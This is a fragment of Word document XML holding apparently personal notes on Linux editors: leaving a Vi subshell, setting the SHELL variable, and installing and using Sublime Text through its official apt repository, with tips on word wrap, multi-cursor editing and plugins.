    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="449"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This sets your SHELL variable to Bash. While this isn't strictly necessary after breaking out, it's good hygiene.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="449"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You could also just do export SHELL=/bin/bash — appending $SHELL is redundant here unless you're stacking variables for some reason.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you are done:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1270"/>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34B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1270"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get out of the Vi subshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1270"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:q</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1270"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get out of Vi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B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B8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xa11ookcye3i" w:id="474"/>
      <w:bookmarkEnd w:id="474"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sublime Text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034BA">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I hate when one line is too long so it wraps onto the next line, so I learned how to disable word wrap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + SHIFT + P</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">word wrap: toggle</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to toggle it on and off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId1140">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">How to download it</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get GPG Key which is used to ensure authenticity when you download 3rd party software</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget -qO - https://download.sublimetext.com/sublimehq-pub.gpg | sudo tee /etc/apt/keyrings/sublimehq-pub.asc &gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get stable version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -e 'Types: deb\nURIs: https://download.sublimetext.com/\nSuites: apt/stable/\nSigned-By: /etc/apt/keyrings/sublimehq-pub.asc' | sudo tee /etc/apt/sources.list.d/sublime-text.sources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:ind w:left="144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34C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1057"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install sublime-text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Edit files using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1245"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subl name.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034CD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🌟 1. Multi-cursor editing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hold Ctrl (or Cmd on Mac) and click in multiple places — you can type or edit in many places at once.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or select a word, then press Ctrl+D repeatedly to select the next occurrences.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">⚡ 2. Command Palette (Ctrl+Shift+P)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Press Ctrl+Shift+P to open the Command Palette — type anything (like "install package" or "indentation") to quickly run Sublime commands without navigating menus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🎨 3. Theme and color schemes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to Preferences &gt; Color Scheme and Preferences &gt; Theme to customize the look and feel — dark mode, light mode, syntax colors, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 4. Goto Anything (Ctrl+P)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Press Ctrl+P and start typing a filename, symbol, or line number (like config.py:@my_function) to jump anywhere instantly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">💡 5. Package Control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install Package Control (via the Command Palette) to get access to tons of plugins, like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    BracketHighlighter (better matching of {} () [])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    GitGutter (show git diffs in the margin)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    SublimeLinter (code linting)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    Material Theme (beautiful UI themes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🚀 6. Snippets and auto-completion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type part of a keyword and hit Tab to auto-expand it (e.g., html → full HTML skeleton).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can even create your own snippets!</w:t>
      </w:r>
    </w:p>
